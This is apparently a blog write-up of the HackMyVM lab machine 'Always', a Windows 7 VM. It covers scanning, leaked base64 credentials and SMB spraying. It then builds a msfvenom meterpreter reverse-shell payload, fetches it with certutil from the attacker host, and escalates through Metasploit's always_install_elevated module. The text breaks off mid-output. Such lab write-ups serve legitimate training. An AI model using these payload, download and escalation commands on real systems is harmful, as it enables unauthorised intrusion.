{"id":823,"date":"2025-03-20T22:30:46","date_gmt":"2025-03-20T14:30:46","guid":{"rendered":"http:\/\/162.14.82.114\/?p=823"},"modified":"2025-03-20T22:30:46","modified_gmt":"2025-03-20T14:30:46","slug":"hmv-_-always","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/823\/03\/20\/2025\/","title":{"rendered":"hmv[-_-]Always"},"content":{"rendered":"<h1>Always<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858512.png\" alt=\"image-20241222193353611\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858514.png\" alt=\"image-20241222194026069\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 172.20.10.3:21\nOpen 172.20.10.3:135\nOpen 172.20.10.3:139\nOpen 172.20.10.3:445\nOpen 172.20.10.3:3389\nOpen 172.20.10.3:5357\nOpen 172.20.10.3:8080\nOpen 172.20.10.3:49152\nOpen 172.20.10.3:49153\nOpen 172.20.10.3:49154\nOpen 172.20.10.3:49155\nOpen 172.20.10.3:49156\nOpen 172.20.10.3:49157\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\nPORT      STATE SERVICE            REASON  VERSION\n21\/tcp    open  ftp                syn-ack Microsoft ftpd\n| ftp-syst: \n|_  SYST: Windows_NT\n135\/tcp   open  msrpc              syn-ack Microsoft Windows RPC\n139\/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds       syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)\n3389\/tcp  open  ssl\/ms-wbt-server? 
syn-ack\n|_ssl-date: 2024-12-22T11:43:22+00:00; +2s from scanner time.\n| ssl-cert: Subject: commonName=Always-PC\n| Issuer: commonName=Always-PC\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha1WithRSAEncryption\n| Not valid before: 2024-10-02T08:06:05\n| Not valid after:  2025-04-03T08:06:05\n| MD5:   80da:3027:dbd7:3cf4:9b54:ede1:b63b:cb33\n| SHA-1: 9c78:542c:e793:514b:9da3:1f67:5cc7:e5d3:16b6:28ed\n| -----BEGIN CERTIFICATE-----\n| MIIC1jCCAb6gAwIBAgIQXL\/J7WrCZa9HyZbN06QgIzANBgkqhkiG9w0BAQUFADAU\n| MRIwEAYDVQQDEwlBbHdheXMtUEMwHhcNMjQxMDAyMDgwNjA1WhcNMjUwNDAzMDgw\n| NjA1WjAUMRIwEAYDVQQDEwlBbHdheXMtUEMwggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQCgkBATZCYEI\/tTPjoB5QLF\/WrVjj6lBnRwh2\/VPBWfTcTZU+OC\n| 7EpaAqsZtt2Um9zAdmEyMWsqRsUdLb\/Mmgau7aMvohJt7NVR+U9GP8TAR2DRQ0HC\n| dlMXshPR5YQ4iOyk0kQasJ8PAoWD1zA2kJInbWxfIzR1JnbBlGlH9tNvTWK86I+z\n| 5IyDsye7IxPgFZpyYU31PVdyMgLJkuMA6LOTVfNjDz7PhNP0QfXhBPTiQ0P3EFSh\n| Vicc2hCPeV2P4TetwEnU+cYo0t+14auukbtG8aIK+Rn0SnpqdtNVHfQlh6a5F7MY\n| Ifg4X2Yom2vZKpu4IHDVp4Eyr6cRnY3m8lz5AgMBAAGjJDAiMBMGA1UdJQQMMAoG\n| CCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQUFAAOCAQEAoBCuRGFZ\n| One8vcYQgBeYFTjG9c4\/t7sAJs5kivGuNivE1T9L6XM0I6syRCy1IMMj5uwCWr4M\n| jKSOY4bokdR4lU1G7pGZ\/nKIGggJimGvOxT2mUfUl7dZHWrtXNqlquvIyYuuLmpC\n| lum0qLH3j4gNMiS\/OW5Z3UlXFwFIA\/S3J8H0GCq23vMQWlaJ6i3b3vMZcXIxOFVk\n| +9qW9gtr7nry9D5g2t9yu\/q\/Bu5tVR\/r2ZE2ERPpRK1UM0xyiH9q7QxvO8p3ad8V\n| M2Gt+LKJTjclxUU+IWsUXu3mDX24RNfr7qroej5PnLw98CKUNqmc2H4xRWIIRaA3\n| w8MHEsc7LPVgBQ==\n|_-----END CERTIFICATE-----\n5357\/tcp  open  http               syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Service Unavailable\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n8080\/tcp  open  http               syn-ack Apache httpd 2.4.57 ((Win64))\n|_http-server-header: Apache\/2.4.57 (Win64)\n| http-methods: \n|   Supported Methods: POST OPTIONS HEAD GET TRACE\n|_  Potentially risky methods: TRACE\n|_http-title: We Are Sorry\n|_http-open-proxy: Proxy 
might be redirecting requests\n49152\/tcp open  msrpc              syn-ack Microsoft Windows RPC\n49153\/tcp open  msrpc              syn-ack Microsoft Windows RPC\n49154\/tcp open  msrpc              syn-ack Microsoft Windows RPC\n49155\/tcp open  msrpc              syn-ack Microsoft Windows RPC\n49156\/tcp open  msrpc              syn-ack Microsoft Windows RPC\n49157\/tcp open  msrpc              syn-ack Microsoft Windows RPC\nService Info: Host: ALWAYS-PC; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb-os-discovery: \n|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)\n|   OS CPE: cpe:\/o:microsoft:windows_7::sp1:professional\n|   Computer name: Always-PC\n|   NetBIOS computer name: ALWAYS-PC\\x00\n|   Workgroup: WORKGROUP\\x00\n|_  System time: 2024-12-22T13:43:17+02:00\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 39463\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 23903\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 47754\/udp): CLEAN (Timeout)\n|   Check 4 (port 59081\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n|_clock-skew: mean: -29m57s, deviation: 59m59s, median: 1s\n| smb2-security-mode: \n|   2:1:0: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2024-12-22T11:43:17\n|_  start_date: 2024-12-22T11:37:03\n| nbstat: NetBIOS name: ALWAYS-PC, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:c2:65:4a (Oracle VirtualBox virtual NIC)\n| Names:\n|   ALWAYS-PC&lt;00&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   ALWAYS-PC&lt;20&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;1e&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;1d&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   \\x01\\x02__MSBROWSE__\\x02&lt;01&gt;  Flags: &lt;group&gt;&lt;active&gt;\n| 
Statistics:\n|   08:00:27:c2:65:4a:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ curl -s http:\/\/$IP:8080 | html2text\n  ****** Our Site Is Under Maintenance. Please Come Back Again Later. ******\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP:8080 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 2 -s 200 301 302 -q\n\n200      GET        8l       20w      178c http:\/\/172.20.10.3:8080\/\n301      GET        7l       20w      238c http:\/\/172.20.10.3:8080\/admin =&gt; http:\/\/172.20.10.3:8080\/admin\/<\/code><\/pre>\n<p>A quick scan is enough: \/admin is the only hit worth following.<\/p>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Sensitive Directory<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858516.png\" alt=\"image-20241222200203749\" \/><\/p>\n<p>Viewing the source of the login page under \/admin reveals:<\/p>\n<pre><code class=\"language-html\">&lt;body&gt;\n    &lt;div class=&quot;container&quot;&gt;\n        &lt;h2&gt;Login&lt;\/h2&gt;\n        &lt;form id=&quot;loginForm&quot; action=&quot;admin_notes.html&quot; method=&quot;POST&quot; onsubmit=&quot;return validateForm()&quot;&gt;\n            &lt;input type=&quot;text&quot; id=&quot;username&quot; name=&quot;username&quot; placeholder=&quot;Username&quot; required&gt;\n            &lt;input type=&quot;password&quot; id=&quot;password&quot; name=&quot;password&quot; placeholder=&quot;Password&quot; required&gt;\n            &lt;button type=&quot;submit&quot;&gt;Login&lt;\/button&gt;\n        &lt;\/form&gt;\n        &lt;div class=&quot;error&quot; id=&quot;errorMessage&quot;&gt;&lt;\/div&gt;\n        &lt;div class=&quot;footer&quot;&gt;2024 Always Corp. All Rights Reserved.&lt;\/div&gt;\n    &lt;\/div&gt;\n\n    &lt;script&gt;\n        function validateForm() {\n            const username = document.getElementById(&quot;username&quot;).value;\n            const password = document.getElementById(&quot;password&quot;).value;\n            const errorMessage = document.getElementById(&quot;errorMessage&quot;);\n\n            if (username === &quot;admin&quot; &amp;&amp; password === &quot;adminpass123&quot;) {\n                return true; \n            }\n\n            errorMessage.textContent = &quot;Invalid Username Or Password!&quot;;\n            return false; \n        }\n    &lt;\/script&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>The &quot;authentication&quot; is entirely client-side: the credentials admin \/ adminpass123 are hard-coded in the JavaScript, and the form only posts to a static page, admin_notes.html. There is no server-side check, so the target page can be fetched directly without logging in:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ curl -s http:\/\/$IP:8080\/admin\/admin_notes.html | html2text\n\n****** Admin&#039;s 
Notes ******\nZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ echo &#039;ZnRwdXNlcjpLZWVwR29pbmdCcm8hISE=&#039; | base64 -d                                \nftpuser:KeepGoingBro!!!   <\/code><\/pre>\n<p>The note is just base64, not encryption, and decodes to an FTP credential. Log in with it and look around (note that cd .. lands in the same listing: the account is confined to its FTP root, and robots.txt is the only file there):<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ ftp $IP                                                                                                              \nConnected to 172.20.10.3.\n220 Microsoft FTP Service\nName (172.20.10.3:kali): ftpuser\n331 Password required for ftpuser.\nPassword: \n230 User logged in.\nRemote system type is Windows_NT.\nftp&gt; ls \n229 Entering Extended Passive Mode (|||49159|)\n150 Opening ASCII mode data connection.\n10-01-24  07:17PM                   56 robots.txt\n226 Transfer complete.\nftp&gt; get robots.txt\nlocal: robots.txt remote: robots.txt\n229 Entering Extended Passive Mode (|||49161|)\n150 Opening ASCII mode data connection.\n100% |************************************************************************************************************************************************|    56      125.71 KiB\/s    00:00 ETA\n226 Transfer complete.\n56 bytes received in 00:00 (37.95 KiB\/s)\nftp&gt; cd ..\n250 CWD command successful.\nftp&gt; ls\n229 Entering Extended Passive Mode (|||49162|)\n150 Opening ASCII mode data connection.\n10-01-24  07:17PM                   56 robots.txt\n226 Transfer complete.\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ cat robots.txt \nUser-agent: *\nDisallow: \/admins-secret-pagexxx.html\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ curl -s http:\/\/$IP:8080\/admin\/admins-secret-pagexxx.html\n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/IETF\/\/DTD HTML 
2.0\/\/EN&quot;&gt;\n&lt;html&gt;&lt;head&gt;\n&lt;title&gt;404 Not Found&lt;\/title&gt;\n&lt;\/head&gt;&lt;body&gt;\n&lt;h1&gt;Not Found&lt;\/h1&gt;\n&lt;p&gt;The requested URL was not found on this server.&lt;\/p&gt;\n&lt;\/body&gt;&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ curl -s http:\/\/$IP:8080\/admins-secret-pagexxx.html | html2text\n\n***** Admin&#039;s Secret Notes *****\n    * 1) Disable the firewall and Windows Defender.\n    * 2) Enable FTP and SSH.\n    * 3) Start the Apache server.\n    * 4) Don&#039;t forget to change the password for user &#039;always&#039;. Current\n      password is &quot;WW91Q2FudEZpbmRNZS4hLiE=&quot;.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ echo &#039;WW91Q2FudEZpbmRNZS4hLiE=&#039; | base64 -d         \nYouCantFindMe.!.!<\/code><\/pre>\n<p>The Disallow path in robots.txt is relative to the web root, not to \/admin\/ (hence the 404 on the first request). The secret page leaks a second base64-encoded password, said to belong to the user &#039;always&#039;.<\/p>\n<h3>Credential Spraying<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ cat user\nftpuser\nalways\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ cat pass\nYouCantFindMe.!.!\nKeepGoingBro!!!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ nxc smb $IP -u user -p pass      \nSMB         172.20.10.3     445    ALWAYS-PC        [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:ALWAYS-PC) (domain:Always-PC) (signing:False) (SMBv1:True)\nSMB         172.20.10.3     445    ALWAYS-PC        [-] Always-PC\\ftpuser:YouCantFindMe.!.! STATUS_LOGON_FAILURE \nSMB         172.20.10.3     445    ALWAYS-PC        [-] Always-PC\\always:YouCantFindMe.!.! 
STATUS_LOGON_FAILURE \nSMB         172.20.10.3     445    ALWAYS-PC        [+] Always-PC\\ftpuser:KeepGoingBro!!!<\/code><\/pre>\n<p>Only ftpuser:KeepGoingBro!!! authenticates over SMB; the password from the note does not work for &#039;always&#039; (STATUS_LOGON_FAILURE), so it has presumably already been changed. Next: get a payload onto the box and hunt for the flags.<\/p>\n<h2>Privilege Escalation<\/h2>\n<p>Following the steps from the foreign writeups (see References) to learn; it has been a long time since I used this and I don&#039;t remember it clearly.<\/p>\n<h3>First, Build a Payload<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/always]\n\u2514\u2500$ sudo msfvenom -p windows\/x64\/meterpreter\/reverse_https LHOST=172.20.10.8 LPORT=443 -f exe &gt; shell.exe\n[sudo] password for kali: \n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 792 bytes\nFinal size of exe file: 7168 bytes<\/code><\/pre>\n<h3>Then Set Up the Listener<\/h3>\n<pre><code class=\"language-bash\">msf6 &gt; use exploit\/multi\/handler\n[*] Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit(multi\/handler) &gt; set payload windows\/x64\/meterpreter\/reverse_https\npayload =&gt; windows\/x64\/meterpreter\/reverse_https\nmsf6 exploit(multi\/handler) &gt; set lhost 172.20.10.8\nlhost =&gt; 172.20.10.8\nmsf6 exploit(multi\/handler) &gt; set lport 443\nlport =&gt; 443\nmsf6 exploit(multi\/handler) &gt; run\n\n[*] Started HTTPS reverse handler on https:\/\/172.20.10.8:443<\/code><\/pre>\n<h3>Then Transfer the Payload<\/h3>\n<p>The login screen is in Turkish, so the keyboard layout has to be switched, or use the on-screen keyboard.....<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858517.png\" alt=\"image-20241222204900921\" \/><\/p>\n<p>It is the control in the top-left corner; just switch it back to English. Log in to the desktop (RDP on 3389 is open) as ftpuser and download the payload from cmd, with shell.exe served over HTTP from the attacking host:<\/p>\n<pre><code class=\"language-bash\">certutil.exe -urlcache -split -f http:\/\/172.20.10.8\/shell.exe shell.exe<\/code><\/pre>\n<p>That works too, but since the system is in Spanish I was worried something would go wrong and just downloaded it with the browser instead!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858518.png\" alt=\"image-20241222205718443\" \/><\/p>\n<p>If that fails, switch the Turkish layout at the bottom to US, then keep clicking the leftmost button in every pop-up that appears!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858519.png\" alt=\"image-20241222210036361\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412231858520.png\" alt=\"image-20241222211700096\" \/><\/p>\n<pre><code class=\"language-bash\">meterpreter &gt; sessions 1\n[*] Session 1 is already interactive.\nmeterpreter &gt; guid\n[+] Session GUID: cc968c17-62c6-45a8-b16f-bcfadbb3b16c\nmeterpreter &gt; shell\nProcess 2916 
created.\nChannel 1 created.\nMicrosoft Windows [S\u00fcr\u00fcm 6.1.7601]\nTelif Hakk\u0131 (c) 2009 Microsoft Corporation. T\u00fcm haklar\u0131 sakl\u0131d\u0131r.\n\nC:\\Users\\ftpuser.Always-PC\\Desktop&gt;hostname\nhostname\nAlways-PC\n\nC:\\Users\\ftpuser.Always-PC\\Desktop&gt;whoami\nwhoami\nalways-pc\\ftpus<\/code><\/pre>\n<p>Background the session and use Metasploit&#039;s local_exploit_suggester to enumerate privilege-escalation candidates:<\/p>\n<pre><code class=\"language-bash\">C:\\Users\\ftpuser.Always-PC\\Desktop&gt;exit\nexit\nmeterpreter &gt; background \n[*] Backgrounding session 1...\nmsf6 exploit(multi\/handler) &gt; search suggest local\n\nMatching Modules\n================\n\n   #  Name                                      Disclosure Date  Rank    Check  Description\n   -  ----                                      ---------------  ----    -----  -----------\n   0  post\/multi\/recon\/local_exploit_suggester  .                normal  No     Multi Recon Local Exploit Suggester\n   1  post\/osx\/manage\/sonic_pi                  .                normal  No     OS X Manage Sonic Pi\n   2    \\_ action: Run                          .                .       .      Run Sonic Pi code\n   3    \\_ action: Stop                         .                .       .      Stop all jobs\n\nInteract with a module by name or index. 
For example info 3, use 3 or use post\/osx\/manage\/sonic_pi\nAfter interacting with a module you can manually set a ACTION with set ACTION &#039;Stop&#039;\n\nmsf6 exploit(multi\/handler) &gt; use 0\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; options\n\nModule options (post\/multi\/recon\/local_exploit_suggester):\n\n   Name             Current Setting  Required  Description\n   ----             ---------------  --------  -----------\n   SESSION                           yes       The session to run this module on\n   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits\n\nView the full module info with the info, or info -d command.\n\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; set SESSION 1\nSESSION =&gt; 1\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; run\n\n[*] 172.20.10.3 - Collecting local exploits for x64\/windows...\n[*] 172.20.10.3 - 196 exploit checks are being tried...\n[+] 172.20.10.3 - exploit\/windows\/local\/always_install_elevated: The target is vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/bypassuac_eventvwr: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/cve_2019_1458_wizardopium: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n[+] 172.20.10.3 - exploit\/windows\/local\/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/cve_2021_40449: The service is running, but could not be validated. 
Windows 7\/Windows Server 2008 R2 build detected!\n[+] 172.20.10.3 - exploit\/windows\/local\/ms10_092_schelevator: The service is running, but could not be validated.\n[+] 172.20.10.3 - exploit\/windows\/local\/ms14_058_track_popup_menu: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/ms15_051_client_copy_image: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/ms15_078_atmfd_bof: The service is running, but could not be validated.\n[+] 172.20.10.3 - exploit\/windows\/local\/ms16_014_wmi_recv_notif: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/tokenmagic: The target appears to be vulnerable.\n[+] 172.20.10.3 - exploit\/windows\/local\/virtual_box_opengl_escape: The service is running, but could not be validated.\n[*] Running check method for exploit 45 \/ 45\n[*] 172.20.10.3 - Valid modules for session 1:\n============================\n\n #   Name                                                           Potentially Vulnerable?  Check Result\n -   ----                                                           -----------------------  ------------\n 1   exploit\/windows\/local\/always_install_elevated                  Yes                      The target is vulnerable.\n 2   exploit\/windows\/local\/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.\n 3   exploit\/windows\/local\/cve_2019_1458_wizardopium                Yes                      The target appears to be vulnerable.\n 4   exploit\/windows\/local\/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. 
Vulnerable Windows 7\/Windows Server 2008 R2 build detected!\n 5   exploit\/windows\/local\/cve_2020_1054_drawiconex_lpe             Yes                      The target appears to be vulnerable.\n 6   exploit\/windows\/local\/cve_2021_40449                           Yes                      The service is running, but could not be validated. Windows 7\/Windows Server 2008 R2 build detected!\n 7   exploit\/windows\/local\/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.\n 8   exploit\/windows\/local\/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.\n 9   exploit\/windows\/local\/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.\n 10  exploit\/windows\/local\/ms15_078_atmfd_bof                       Yes                      The service is running, but could not be validated.\n 11  exploit\/windows\/local\/ms16_014_wmi_recv_notif                  Yes                      The target appears to be vulnerable.\n 12  exploit\/windows\/local\/tokenmagic                               Yes                      The target appears to be vulnerable.\n 13  exploit\/windows\/local\/virtual_box_opengl_escape                Yes                      The service is running, but could not be validated.\n 14  exploit\/windows\/local\/agnitum_outpost_acs                      No                       The target is not exploitable.\n 15  exploit\/windows\/local\/bits_ntlm_token_impersonation            No                       The target is not exploitable.\n 16  exploit\/windows\/local\/bypassuac_dotnet_profiler                No                       The target is not exploitable.\n 17  exploit\/windows\/local\/bypassuac_fodhelper                      No                       The target is not exploitable.\n 18  exploit\/windows\/local\/bypassuac_sdclt                          No                       The target is 
not exploitable.\n 19  exploit\/windows\/local\/bypassuac_sluihijack                     No                       The target is not exploitable.\n 20  exploit\/windows\/local\/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found\n 21  exploit\/windows\/local\/capcom_sys_exec                          No                       The target is not exploitable.\n 22  exploit\/windows\/local\/cve_2020_0796_smbghost                   No                       The target is not exploitable.\n 23  exploit\/windows\/local\/cve_2020_1048_printerdemon               No                       The target is not exploitable.\n 24  exploit\/windows\/local\/cve_2020_1313_system_orchestrator        No                       The target is not exploitable.\n 25  exploit\/windows\/local\/cve_2020_1337_printerdemon               No                       The target is not exploitable.\n 26  exploit\/windows\/local\/cve_2020_17136                           No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!\n 27  exploit\/windows\/local\/cve_2021_21551_dbutil_memmove            No                       The target is not exploitable.\n 28  exploit\/windows\/local\/cve_2022_21882_win32k                    No                       The target is not exploitable.\n 29  exploit\/windows\/local\/cve_2022_21999_spoolfool_privesc         No                       The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot.\n 30  exploit\/windows\/local\/cve_2022_3699_lenovo_diagnostics_driver  No                       The target is not exploitable.\n 31  exploit\/windows\/local\/cve_2023_21768_afd_lpe                   No                       The target is not exploitable. 
The exploit only supports Windows 11 22H2\n 32  exploit\/windows\/local\/cve_2023_28252_clfs_driver               No                       The target is not exploitable. The target system does not have clfs.sys in system32\\drivers\\\n 33  exploit\/windows\/local\/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found\n 34  exploit\/windows\/local\/ikeext_service                           No                       The check raised an exception.\n 35  exploit\/windows\/local\/lexmark_driver_privesc                   No                       The target is not exploitable. No Lexmark print drivers in the driver store\n 36  exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc  No                       The target is not exploitable.\n 37  exploit\/windows\/local\/ms16_075_reflection                      No                       The target is not exploitable.\n 38  exploit\/windows\/local\/ms16_075_reflection_juicy                No                       The target is not exploitable.\n 39  exploit\/windows\/local\/ntapphelpcachecontrol                    No                       The check raised an exception.\n 40  exploit\/windows\/local\/nvidia_nvsvc                             No                       The check raised an exception.\n 41  exploit\/windows\/local\/panda_psevents                           No                       The target is not exploitable.\n 42  exploit\/windows\/local\/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found\n 43  exploit\/windows\/local\/srclient_dll_hijacking                   No                       The target is not exploitable. 
Target is not Windows Server 2012.\n 44  exploit\/windows\/local\/webexec                                  No                       The check raised an exception.\n 45  exploit\/windows\/local\/win_error_cve_2023_36874                 No                       The target is not exploitable.<\/code><\/pre>\n<p>Of the candidates, always_install_elevated is the only one reported as confirmed vulnerable rather than &quot;appears to be&quot; (the box name is a hint too). The module uploads an MSI to the user&#039;s Temp directory and runs it; with the AlwaysInstallElevated policy set in both HKLM and HKCU, Windows Installer executes the package as SYSTEM:<\/p>\n<pre><code class=\"language-bash\">[*] Post module execution completed\nmsf6 post(multi\/recon\/local_exploit_suggester) &gt; use 1\nmsf6 post(osx\/manage\/sonic_pi) &gt; use exploit\/windows\/local\/always_install_elevated\n[*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\nmsf6 exploit(windows\/local\/always_install_elevated) &gt; options\n\nModule options (exploit\/windows\/local\/always_install_elevated):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   SESSION                   yes       The session to run this module on\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  process          yes       Exit technique (Accepted: &#039;&#039;, seh, thread, process, none)\n   LHOST     10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Windows\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(windows\/local\/always_install_elevated) &gt; set SESSION 1\nSESSION =&gt; 1\nmsf6 exploit(windows\/local\/always_install_elevated) &gt; set lhost 172.20.10.8 \nlhost =&gt; 172.20.10.8\nmsf6 exploit(windows\/local\/always_install_elevated) &gt; run\n\n[*] Started reverse TCP handler on 172.20.10.8:4444 \n[*] Uploading the MSI to C:\\Users\\FTPUSE~1.ALW\\AppData\\Local\\Temp\\jiCwTOfrMvJ.msi ...\n[*] Executing MSI...\n[*] Sending stage (176198 bytes) to 
